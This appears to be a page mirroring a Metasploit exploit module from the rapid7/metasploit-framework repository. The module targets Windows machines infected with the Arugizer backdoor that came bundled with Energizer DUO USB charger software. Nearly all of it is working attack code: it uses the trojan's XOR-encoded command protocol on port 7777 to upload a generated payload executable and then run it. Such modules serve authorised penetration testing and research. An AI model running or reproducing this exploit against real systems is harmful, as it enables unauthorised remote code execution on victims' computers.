Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/backdoor/energizer_duo_payload.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',

17
        'Description' => %q{

18
          This module will execute an arbitrary payload against

19
          any system infected with the Arugizer trojan horse. This

20
          backdoor was shipped with the software package accompanying

21
          the Energizer DUO USB battery charger.

22
        },

23
        'Author' => [ 'hdm' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['CVE', '2010-0103'],

27
          ['OSVDB', '62782'],

28
          ['US-CERT-VU', '154421']

29
        ],

30
        'Platform' => 'win',

31
        'Targets' => [

32
          [ 'Automatic', {} ],

33
        ],

34
        'DefaultTarget' => 0,

35
        'DisclosureDate' => '2010-03-05',

36
        'Notes' => {

37
          'Reliability' => UNKNOWN_RELIABILITY,

38
          'Stability' => UNKNOWN_STABILITY,

39
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        Opt::RPORT(7777),

47
      ]

48
    )

49
  end

50


51
  def trojan_encode(str)

52
    str.unpack("C*").map { |c| c ^ 0xE5 }.pack("C*")

53
  end

54


55
  def trojan_command(cmd)

56
    cid = ""

57


58
    case cmd

59
    when :exec

60
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"

61
    when :dir

62
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"

63
    when :write

64
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"

65
    when :read

66
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"

67
    when :nop

68
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"

69
    when :find

70
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"

71
    when :yes

72
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"

73
    when :runonce

74
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"

75
    when :delete

76
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"

77
    end

78


79
    trojan_encode(

80
      [cid.length + 1].pack("V") + cid + "\x00"

81
    )

82
  end

83


84
  def exploit

85
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"

86
    exe = generate_payload_exe + "\x00"

87


88
    print_status("Trying to upload #{nam}...")

89
    connect

90


91
    # Write file request

92
    sock.put(trojan_command(:write))

93
    sock.put(trojan_encode([nam.length].pack("V")))

94
    sock.put(trojan_encode(nam))

95
    sock.put(trojan_encode([exe.length].pack("V")))

96
    sock.put(trojan_encode(exe))

97


98
    # Required to prevent the server from spinning a loop

99
    sock.put(trojan_command(:nop))

100


101
    disconnect

102


103
    #

104
    # Execute the payload

105
    #

106


107
    print_status("Trying to execute #{nam}...")

108


109
    connect

110


111
    # Execute file request

112
    sock.put(trojan_command(:exec))

113
    sock.put(trojan_encode([nam.length].pack("V")))

114
    sock.put(trojan_encode(nam))

115


116
    # Required to prevent the server from spinning a loop

117
    sock.put(trojan_command(:nop))

118


119
    disconnect

120
  end

121
end

122


123